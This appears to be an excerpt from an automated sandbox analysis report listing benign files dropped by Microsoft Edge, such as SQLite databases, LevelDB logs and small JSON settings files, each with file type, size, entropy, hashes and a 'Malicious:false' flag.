                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                    Entropy (8bit):0.44194574462308833
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                    MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                    SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                    SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                    SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):350
                                                                                                                                                                                    Entropy (8bit):5.104197154333322
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOrZU++q2Pwkn23oH+Tcwt7Uh2ghZIFUtJZUdtFZZmwPZUdtFNVkwOwkn23oH+T8:7ivYfYebIhHh2FUtctX/+tF5JfYebIh9
                                                                                                                                                                                    MD5:73AA88CD5192AA0D225488E2E7F037A1
                                                                                                                                                                                    SHA1:EDE080D88B1848CD4C206349C3E79FAD93FAE38D
                                                                                                                                                                                    SHA-256:4F637C65F4A5944BEFDA868451BC39091DDB4675E7635571AE2D892D0EE62225
                                                                                                                                                                                    SHA-512:304B65A8B6E8E49A2B5E87D4765F819CE3E89DC586B76E448A636526BC9FD7DAF758CBCFEA17B5A1346F71CE6E1C4FE529BF6271058EFA95E0FFFF4B467EED41
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:01.317 1af8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/09-09:30:01.318 1af8 Recovering log #3.2025/01/09-09:30:01.318 1af8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):350
                                                                                                                                                                                    Entropy (8bit):5.104197154333322
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOrZU++q2Pwkn23oH+Tcwt7Uh2ghZIFUtJZUdtFZZmwPZUdtFNVkwOwkn23oH+T8:7ivYfYebIhHh2FUtctX/+tF5JfYebIh9
                                                                                                                                                                                    MD5:73AA88CD5192AA0D225488E2E7F037A1
                                                                                                                                                                                    SHA1:EDE080D88B1848CD4C206349C3E79FAD93FAE38D
                                                                                                                                                                                    SHA-256:4F637C65F4A5944BEFDA868451BC39091DDB4675E7635571AE2D892D0EE62225
                                                                                                                                                                                    SHA-512:304B65A8B6E8E49A2B5E87D4765F819CE3E89DC586B76E448A636526BC9FD7DAF758CBCFEA17B5A1346F71CE6E1C4FE529BF6271058EFA95E0FFFF4B467EED41
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:01.317 1af8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/09-09:30:01.318 1af8 Recovering log #3.2025/01/09-09:30:01.318 1af8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.01057775872642915
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsFl:/F
                                                                                                                                                                                    MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                    SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                    SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                    SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                    Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                    MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                    SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                    SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                    SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.011852361981932763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                    MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                    SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                    SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                    SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.012340643231932763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                    MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                    SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                    SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                    SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):524656
                                                                                                                                                                                    Entropy (8bit):5.027445846313988E-4
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:Lsuluxl/:Lsxb
                                                                                                                                                                                    MD5:0919631FC64A2C2FB6F67A511A7E74E8
                                                                                                                                                                                    SHA1:4849C3818A7A036A52D28CED12BE4C1ECDC4D78A
                                                                                                                                                                                    SHA-256:75987AE5D3029ABB06D8E5AA07277FE287F9F73A9FCB3361B8CC82AF9C76C907
                                                                                                                                                                                    SHA-512:0AD9573563F90DEDFD20EA9F44F6D1DEA78B427E1FC4BF38ACDB123F155207E93BBA396D0B6934EA7D56A307BAA2BCE876EA839C54B93A496D5AA8DF0413B675
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................P. ../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.01057775872642915
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsFl:/F
                                                                                                                                                                                    MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                    SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                    SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                    SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.011852361981932763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                    MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                    SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                    SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                    SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.012340643231932763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                    MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                    SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                    SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                    SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):262512
                                                                                                                                                                                    Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:LsNl29Ut:Ls39t
                                                                                                                                                                                    MD5:636A053941B3F7282F7CFC1D80516369
                                                                                                                                                                                    SHA1:AF2F3D2E6A75ED45E85586F5CDBB566145B89503
                                                                                                                                                                                    SHA-256:E5D547A7AAD481043A5B4170D8287DFD8C6964B5FAA56A434D87A470A019F571
                                                                                                                                                                                    SHA-512:526D8063F365F04E07AF503C845561AE14BA3690B05D36A804F5607507ECD407A4F52A437EBD15CD7A56C44EEC052DCE578D9DA9616EBC870963093BA9229804
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.........................................i.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):432
                                                                                                                                                                                    Entropy (8bit):5.226036708890109
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:7i4IvYfYebvqBQFUt4x/ud5JfYebvqBvJ:7ilYfYebvZg4kPJfYebvk
                                                                                                                                                                                    MD5:CD28D377AC0A8CEEDE64A00B0B4DAE5F
                                                                                                                                                                                    SHA1:498F5E0A3D0161E875FA6B89D0E5204DD318D0E9
                                                                                                                                                                                    SHA-256:4C6D982945B0F85A9ADF205E262EABCB361AFF9FE882713CBAE0B94DE41FEE8A
                                                                                                                                                                                    SHA-512:87054D810F172A008C33DAB7F9769323B9B36DB322733EF696F6055FF6D19181247258604A38EF6464064F99599F00D785B18F2EA29FACCA67329E3AFBAB9271
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:02.395 1318 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/09-09:30:02.396 1318 Recovering log #3.2025/01/09-09:30:02.398 1318 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):432
                                                                                                                                                                                    Entropy (8bit):5.226036708890109
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:7i4IvYfYebvqBQFUt4x/ud5JfYebvqBvJ:7ilYfYebvZg4kPJfYebvk
                                                                                                                                                                                    MD5:CD28D377AC0A8CEEDE64A00B0B4DAE5F
                                                                                                                                                                                    SHA1:498F5E0A3D0161E875FA6B89D0E5204DD318D0E9
                                                                                                                                                                                    SHA-256:4C6D982945B0F85A9ADF205E262EABCB361AFF9FE882713CBAE0B94DE41FEE8A
                                                                                                                                                                                    SHA-512:87054D810F172A008C33DAB7F9769323B9B36DB322733EF696F6055FF6D19181247258604A38EF6464064F99599F00D785B18F2EA29FACCA67329E3AFBAB9271
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:02.395 1318 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/09-09:30:02.396 1318 Recovering log #3.2025/01/09-09:30:02.398 1318 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):193
                                                                                                                                                                                    Entropy (8bit):4.864047146590611
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                                                    MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                                                    SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                                                    SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                                                    SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                    Entropy (8bit):0.555790634850688
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                                                                                                                                                                    MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                                                                                                                                                                    SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                                                                                                                                                                    SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                                                                                                                                                                    SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                    Entropy (8bit):0.36515621748816035
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                    MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                                    SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                    SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                    SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
